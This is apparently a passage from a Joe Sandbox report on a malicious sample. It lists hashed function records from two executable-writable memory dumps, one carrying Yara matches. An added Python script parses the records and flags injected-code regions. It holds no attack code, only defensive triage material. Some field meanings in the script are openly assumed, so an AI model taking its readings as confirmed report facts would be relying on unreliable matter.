                                              • Instruction ID: 5f71ce64a95ad967f1b036d8f708bea3ec8dca425948af8bd570b1a03b84bd6e
                                              • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                              • Instruction Fuzzy Hash: 29E02B323409116BE7119E09CC80F03376DDFD2725F014078F5081F282C6E5DC0887A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ea2df09ade1207a9ace8578f241db69df758ed662ce76662a7feefcaadb4afab
                                              • Instruction ID: aebb703c1cbf49a9188b75c559cb5a83ebc1edbc4daef8db49f49f1948c78193
                                              • Opcode Fuzzy Hash: ea2df09ade1207a9ace8578f241db69df758ed662ce76662a7feefcaadb4afab
                                              • Instruction Fuzzy Hash: A8F0B470A046189FDB14EFB8D541AAEB7F8EF58300F108099E909EB280DA34D900C754
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1be281ec90d9113a1cd4dd50535494330269abeb49dd31b1d8ba08939837f53b
                                              • Instruction ID: 120d4c94ec9793b0dc6022a4f18f8e91f500505c23b775444955eb872e47d377
                                              • Opcode Fuzzy Hash: 1be281ec90d9113a1cd4dd50535494330269abeb49dd31b1d8ba08939837f53b
                                              • Instruction Fuzzy Hash: ABF05470A042699BDB14EBB8D546E6E77B8AB44304F040459A909DB2C0EA34D900C754
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c3d2692faea16f0a854e0cee45f7cd26a36e9d9b17294018b032814442255230
                                              • Instruction ID: d00393c889dbf235ab02f333e20c2cf5dba1229ee56749095577599ba73bd682
                                              • Opcode Fuzzy Hash: c3d2692faea16f0a854e0cee45f7cd26a36e9d9b17294018b032814442255230
                                              • Instruction Fuzzy Hash: BFF089709052199FDB14DBE8D545DAE77F8EF59314F100159E919EB2C0D934D900C754
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 29aa7de3ebf68ebf151b767adb3477e957bc2aa18c7954d01be9fcce6818eab9
                                              • Instruction ID: ef13865fce033638051b8e887290111a2d84e5d4a87b15e212ff7ff3b5e83abe
                                              • Opcode Fuzzy Hash: 29aa7de3ebf68ebf151b767adb3477e957bc2aa18c7954d01be9fcce6818eab9
                                              • Instruction Fuzzy Hash: A6F0F034500146BECF0B9AECC440F797B63AF04B60F064915D8D9A70A1E324A840C785
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9d44ebcc7c7b686f7cb95a36eacd3617120308744dd4e1942313882c82ce27cd
                                              • Instruction ID: 9a9b3a41e38b5e320da80a3515a635ee49f0ea3e6bae7c4a1c48480c4ee27603
                                              • Opcode Fuzzy Hash: 9d44ebcc7c7b686f7cb95a36eacd3617120308744dd4e1942313882c82ce27cd
                                              • Instruction Fuzzy Hash: F8F0E2325256848FDB72EB1CC188FA2B7DCAB04B79F488464E60DC7922D734EC44C648
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b75707b107c90f1ef11e8efcfc399c19e03c606475eab1bafa95f7fdf39d4763
                                              • Instruction ID: 0b672aa4e1969f3a545e3c1d037896ccfcc6c3a4bf7188a207712e6c420f5b35
                                              • Opcode Fuzzy Hash: b75707b107c90f1ef11e8efcfc399c19e03c606475eab1bafa95f7fdf39d4763
                                              • Instruction Fuzzy Hash: 3BE0D872A42821ABD3225F59FC00F7773ADDBE4A51F094435F608C7258D628DD41C7E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                              • Instruction ID: 1559c90070cb59612c295542477b13169db75750769e6833c6e2720d04723ea4
                                              • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                              • Instruction Fuzzy Hash: A7E0D832A40118FBDB21A6D99E05F5ABFACDB94B60F000196BB08D7190D5609E40C3D0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d8a9f835ebaa65fd2fa8e90295f9ca129a5377a8268c4f2b78dce1d03544c1ac
                                              • Instruction ID: eeb8a3e81dfe8ce9034029ba2628ffbcfddc6d804f6f91b464d44fb11fc6dcd7
                                              • Opcode Fuzzy Hash: d8a9f835ebaa65fd2fa8e90295f9ca129a5377a8268c4f2b78dce1d03544c1ac
                                              • Instruction Fuzzy Hash: E4E0DFB2605204DFD736DF5AD980F253BACDB92721F19841EE30CCB102CE21DA80C286
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f3f1ead9bce4a9dd928b34c7347cdb69b3ed78ed3746ce029c649753fbdf7fb5
                                              • Instruction ID: dcde7624238540a874e4d14841c1410ff5161f3752aadeb439f0c55bb5c974fb
                                              • Opcode Fuzzy Hash: f3f1ead9bce4a9dd928b34c7347cdb69b3ed78ed3746ce029c649753fbdf7fb5
                                              • Instruction Fuzzy Hash: B0F03978916702EFCBB2EFA9D50071476F4FB94721F42811AD10887A8BC73449E4CF02
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                              • Instruction ID: 25ff5177c2d21a9724178bb7ce5f3335352efdf98b71887024366234b2807014
                                              • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                              • Instruction Fuzzy Hash: 57E0C231280219FBDF225E88CC01F797B9ADB507A6F104431FE0C9A691C675AD91D6C4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5451494cd2c6d8c770f5958625a4cfa43b4f8ae62d51c84fb87ff3f3116ef638
                                              • Instruction ID: 2efc543e8296373d181e5fd87ee006beb3d383aa3ed897251d365573b005b341
                                              • Opcode Fuzzy Hash: 5451494cd2c6d8c770f5958625a4cfa43b4f8ae62d51c84fb87ff3f3116ef638
                                              • Instruction Fuzzy Hash: 3BD02B7112228A1EC72F53008914B213262F7C07B0F34880CF24F0B5D9E9608CD0C108
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f8c082fff2240b4fa4e346ec8810f3d4c4255b1745b3827c6aea34d48e65be04
                                              • Instruction ID: e2a602ecb55849b727d2a1ec201a55b6a3ffd6f4420eb85332b16eb9358b69b9
                                              • Opcode Fuzzy Hash: f8c082fff2240b4fa4e346ec8810f3d4c4255b1745b3827c6aea34d48e65be04
                                              • Instruction Fuzzy Hash: 06D0A731200206B6FA2E5B249C14B142655EBD07C2F38047CF30F494C1DFA1CCD2E048
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ec1dd7176cff8b720289a5d61207f0b592408c2f11dd09c84b95a6707fa6eeb7
                                              • Instruction ID: f75fb7126e66798394176c4e5adfa3720f14ec3b75ff0e1e6e6b10f1c62358b7
                                              • Opcode Fuzzy Hash: ec1dd7176cff8b720289a5d61207f0b592408c2f11dd09c84b95a6707fa6eeb7
                                              • Instruction Fuzzy Hash: BAC01231B1951205D620BC5C7842179F3958793234F5423ABE405B219089869061058B
                                              Uniqueness

                                              Uniqueness Score: -1.00%
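Every record in this section is a per-function entry lifted from one of two memory dumps of process 7, and the dump file name itself carries the triage-relevant facts: the region base (which matches the "Offset:" printed beside it) and the page protection. The parser below is an added example, not part of the Joe Sandbox report or its tooling: it turns a block of these records into structured data, decodes the dump name, and groups the functions by region. The protection field is decoded with the winnt.h constants (0x40 is PAGE_EXECUTE_READWRITE); the meaning of the second, third and sixth fields of the name is assumed and left undecoded. The sample input is two records excerpted from this section, shortened to the fields the parser uses.

```python
"""Parse Joe Sandbox per-function records and flag the dump regions they came from.
Added example, not report code; .sdmp field meanings other than process / base /
protection are assumptions (see DumpSource)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Page protection constants from winnt.h (fifth field of the dump name).
PAGE_PROTECTION = {
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}


@dataclass
class DumpSource:
    process: int      # field 1: process index used throughout the report
    stage: int        # field 2: dump stage (assumed; every dump on this page is stage 2)
    dump_id: str      # field 3: opaque dump serial, kept as text (number base not assumed)
    base: int         # field 4: region base; equals the "Offset:" printed next to it
    protection: int   # field 5: page protection bits
    kind: int         # field 6: memory type flag (meaning assumed, not decoded)

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection, f"0x{self.protection:02X}")

    @property
    def is_rwx(self) -> bool:
        return self.protection == 0x40


def parse_sdmp_name(name: str) -> DumpSource:
    """Split '<pid>.<stage>.<id>.<base>.<prot>.<kind>.sdmp' into its fields."""
    stem = name[:-5] if name.endswith(".sdmp") else name
    f = stem.split(".")
    if len(f) != 6 or not all(re.fullmatch(r"[0-9A-Fa-f]+", x) for x in f):
        raise ValueError(f"unexpected dump name: {name!r}")
    return DumpSource(int(f[0], 16), int(f[1], 16), f[2], int(f[3], 16), int(f[4], 16), int(f[5], 16))


@dataclass
class FunctionRecord:
    source: DumpSource
    offset: int
    based_on_pe: bool
    yara_match: bool
    api_ids: List[str]
    instruction_fuzzy_hash: str
    uniqueness_score: Optional[float]   # None when the report prints -1.00% (no score computed)


SOURCE_RE = re.compile(r"Source File:\s*(?P<name>\S+?),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
                       r"\s*based on PE:\s*(?P<pe>true|false)")
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")


def parse_records(text: str) -> List[FunctionRecord]:
    """One record per 'Memory Dump Source' ... 'Uniqueness Score' block; a block cut off
    before its score line (as at the end of a page) is dropped rather than guessed."""
    records: List[FunctionRecord] = []
    cur: Optional[Dict[str, str]] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {}
        elif cur is None:
            continue
        elif line == "Yara matches":
            cur["yara"] = "1"
        elif (m := SOURCE_RE.search(line)):
            cur.update(name=m["name"], off=m["off"], pe=m["pe"])
        elif (m := FIELD_RE.match(line)):
            cur[m["key"].strip()] = m["val"].strip()
        elif line.startswith("Uniqueness Score:"):
            score = float(line.split(":", 1)[1].strip().rstrip("%"))
            records.append(FunctionRecord(
                source=parse_sdmp_name(cur["name"]), offset=int(cur["off"], 16),
                based_on_pe=cur["pe"] == "true", yara_match=cur.get("yara") == "1",
                api_ids=[a.strip() for a in cur.get("API ID", "").split(",") if a.strip()],
                instruction_fuzzy_hash=cur.get("Instruction Fuzzy Hash", ""),
                uniqueness_score=None if score < 0 else score))
            cur = None
    return records


def summarize_regions(records: List[FunctionRecord]) -> Dict[Tuple[int, int], Dict[str, object]]:
    """Collapse per-function records into one row per (process, region base)."""
    regions: Dict[Tuple[int, int], Dict[str, object]] = {}
    for r in records:
        g = regions.setdefault((r.source.process, r.source.base), {
            "protection": r.source.protection_name, "rwx": r.source.is_rwx,
            "functions": 0, "based_on_pe": False, "yara": False, "api_calls": 0})
        g["functions"] += 1
        g["based_on_pe"] = g["based_on_pe"] or r.based_on_pe
        g["yara"] = g["yara"] or r.yara_match
        g["api_calls"] += len(r.api_ids)
    return regions


def injected_code_regions(records: List[FunctionRecord]) -> List[Tuple[int, int]]:
    """Regions to pull first: a PE image in PAGE_EXECUTE_READWRITE memory is what an
    unpacked or injected payload looks like; an image mapped from disk is normally
    PAGE_EXECUTE_READ or PAGE_EXECUTE_WRITECOPY."""
    return sorted(k for k, g in summarize_regions(records).items() if g["rwx"] and g["based_on_pe"])


# Constructed sample: two records excerpted from this section, shortened.
SAMPLE = """\
Memory Dump Source
• Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c6a3df0b70cb9c210f48b22aff50852e9cbe8b61b7fbbc033d5ac1910292de49
• Instruction Fuzzy Hash: B7014474A0121DAFDB14DFA8D545AAEBBF8EF58300F104459F949EB380DA34DA00CB94
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ec1dd7176cff8b720289a5d61207f0b592408c2f11dd09c84b95a6707fa6eeb7
• Instruction Fuzzy Hash: BAC01231B1951205D620BC5C7842179F3958793234F5423ABE405B219089869061058B
Uniqueness

Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for (pid, base), g in summarize_regions(recs).items():
        print(f"process {pid} region {base:#010x}: {g['protection']}, {g['functions']} function(s), "
              f"PE image={g['based_on_pe']}, Yara={g['yara']}, API refs={g['api_calls']}")
    print("pull first:", [f"{b:#x}" for _, b in injected_code_regions(recs)])
```

Run over the whole section, both regions come out as PAGE_EXECUTE_READWRITE with "based on PE: true": 0x400000 (the usual 32-bit image base, and the dump where the Yara matches sit) and the private region at 0x18C0000. None of these functions carries an API ID or String ID, so the Instruction Fuzzy Hash is the only handle for pivoting to other samples; the -1.00% uniqueness score is read as "not computed", which is an interpretation of the report's output rather than something the page states.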

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                              • Instruction ID: 097a4e414f9341155a9e2f686e5c86e5fc53cb653559f23836c5d51981546359
                                              • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                              • Instruction Fuzzy Hash: 79E08C31900684DFDF12DB8CCA90F4EBBF9FB84B80F160408A108AF661C624AD00CB10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                              • Instruction ID: 70f4530b96d451e775bb7db753582e367f2c0a4d021091cfd7e91a1632f21955
                                              • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                              • Instruction Fuzzy Hash: A9D0E935352980CFD61BCB1DC554B1577A8BB44B45FC50494E505CB762E62CD944CA10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                              • Instruction ID: fe63966b7255e1f328171587b1c62cd515950c039654ce55a4bbb8c40549f345
                                              • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                              • Instruction Fuzzy Hash: F0D0A93140118D9EEB02AB18C218B683BB7BB00A29F582069C10E4686EC33A4B8AC601
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                              • Instruction ID: 13bfb987362bd6d0947728ea23067b866f4dd89f0f66771a70e1296e1b341349
                                              • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                              • Instruction Fuzzy Hash: 41C08C30290A01AEEB221F20CE01B003AA1BB91B01F4400A06300DA0F0EB78D901E600
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                              • Instruction ID: 399acb018b5c7d57792455a55fc03a5e5b46c6d13e0b3845388b8a4432b92fc0
                                              • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                              • Instruction Fuzzy Hash: 95C01232180648BBCB126E81CC00F067B2AEBA4B60F008010BA080A5A0C632E9B0EA84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                              • Instruction ID: 13c30a883cb70f893b920fb4f4f769778f9dcfff0bbf3db73d28d35a65153971
                                              • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                              • Instruction Fuzzy Hash: C3C04C32180648BBC7126E45DD01F157B69E7A4B60F154021B7080B5A1D576ED61D598
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                              • Instruction ID: 7be3263295cf80806cdf716d30d5f6fff9c111427d110ed82285efde72e1f03a
                                              • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                              • Instruction Fuzzy Hash: EDC08C32080248BBC7126A85CD00F017B29E7A0BA0F000020B6080A6A2C932E860D588
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                              • Instruction ID: 2da1319eaa9a2a9efcfb877f0e49ff6004e2babc034545874b746040e68ac9cb
                                              • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                              • Instruction Fuzzy Hash: E4C02B70150840FFD7165F30CF01F147268F740A72F6407647324464F0E5289C00D100
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                              • Instruction ID: ccad04f39f5e9eb18ae106d51eaf9ecc0af51937a2a4a462eea2a73aac161fbd
                                              • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                              • Instruction Fuzzy Hash: 8BC08C701411805EFB2B570CCE20B203A50AB08708F4801ACAB45894E2D36CB902C248
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                              • Instruction ID: 2daa9ecb6e24ba3e8907277029f5a9d4dc07a7a1618eb0ac3425dc70c92a9d26
                                              • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                              • Instruction Fuzzy Hash: 98B092353019408FCE1BDF18C080B1533E8BB44A40B8400D0E404CBA21D229E9008900
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                              • Instruction ID: ead375b341380766878e1470b3c1aadd5e43cd3ab07535329c35d249cf4e9357
                                              • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                              • Instruction Fuzzy Hash: A4B01232C10445CFCF02EF44C650B197332FB00750F0644949101B7930C228AD01CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8fadadcd4cdd42bec00fb4e522730cb3553d8700e3b83098c220512be90a1317
                                              • Instruction ID: 3ac500901594b8ffb197f622cd6f16181af1c7369ceec3208944241f0d83a0ca
                                              • Opcode Fuzzy Hash: 8fadadcd4cdd42bec00fb4e522730cb3553d8700e3b83098c220512be90a1317
                                              • Instruction Fuzzy Hash: 2D9002A162110042D1046199441470640C5A7E1242F91C012A2184554CC5698C716165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 18117ab70d3e50341fbfbed99477e8c22deba28564281f2811f4ce60cb054b94
                                              • Instruction ID: 5efa28d5115634bd4c5cf23545e58b3914d477823f764da9c9650b16f6269e2a
                                              • Opcode Fuzzy Hash: 18117ab70d3e50341fbfbed99477e8c22deba28564281f2811f4ce60cb054b94
                                              • Instruction Fuzzy Hash: 8A9002A161150403D140659948146074085A7D0343F91C011A2094555ECA698C617175
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cd6e6c3085e2c328ab0ca19ba6ab26cf0e7567d85bf5bc097fb08555f6c28b23
                                              • Instruction ID: 32e431d9c8e9feec3400b22bf84d085514b040ad70633de53850e6bd1b60e77f
                                              • Opcode Fuzzy Hash: cd6e6c3085e2c328ab0ca19ba6ab26cf0e7567d85bf5bc097fb08555f6c28b23
                                              • Instruction Fuzzy Hash: 3190026171110402D102619944246064089E7D1386FD1C012E1454555DC6658963B172
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 982659626b84bc12838b02b6e2d11f3e9ccac74583d187a7ae643162221cd23f
                                              • Instruction ID: c2d7d9028324c5158759ad2d6205648baecbe433d53f42b4979b359b6db3e551
                                              • Opcode Fuzzy Hash: 982659626b84bc12838b02b6e2d11f3e9ccac74583d187a7ae643162221cd23f
                                              • Instruction Fuzzy Hash: 5D90027165110402D141719944146064089B7D0282FD1C012A0454554EC6958A66BAA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ed66aa69ddfa74ec18681fea0cd4b0e8ce05d05dab979328a1b58e1938bbb4e2
                                              • Instruction ID: b86d707b29d1f9bd5b3b6af05f8f575f954eb52a5483cb00257eece02ade99da
                                              • Opcode Fuzzy Hash: ed66aa69ddfa74ec18681fea0cd4b0e8ce05d05dab979328a1b58e1938bbb4e2
                                              • Instruction Fuzzy Hash: 589002A1A11240434540B19948144069095B7E13423D1C121A0484560CC6A88865A2A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ea6219b4c7a94f28917801ce7d93c54e9af8c8bb5f35f64c28fa07e501b31a14
                                              • Instruction ID: 481bc3ac8482457a44ff5300cca8494c986d95943795af4396b0e6059fc6ab94
                                              • Opcode Fuzzy Hash: ea6219b4c7a94f28917801ce7d93c54e9af8c8bb5f35f64c28fa07e501b31a14
                                              • Instruction Fuzzy Hash: E390027161154002D1407199845460B9085B7E0342F91C411E0455554CC6558866A261
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f3615f4efe181eaf3e96bef46e2e37331ab68b4460c9f25a97a8b3e59a0f3a1d
                                              • Instruction ID: f4ebbcce3b71f1c3ce96c5bfdbcc87e0e3d354af7f15aa5f64ba00fed9e57fdc
                                              • Opcode Fuzzy Hash: f3615f4efe181eaf3e96bef46e2e37331ab68b4460c9f25a97a8b3e59a0f3a1d
                                              • Instruction Fuzzy Hash: AC90026165110802D140719984247074086E7D0642F91C011A0054554DC656897576F1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b26858e2ce06f20443228b1259f81fbb752f93464a741f8e2530f06ffa3cd697
                                              • Instruction ID: 141d5bfbf4eae744b17ea0b0b19bdd9d16f4dfe9d0c216c2f0b29fb1340f3d8a
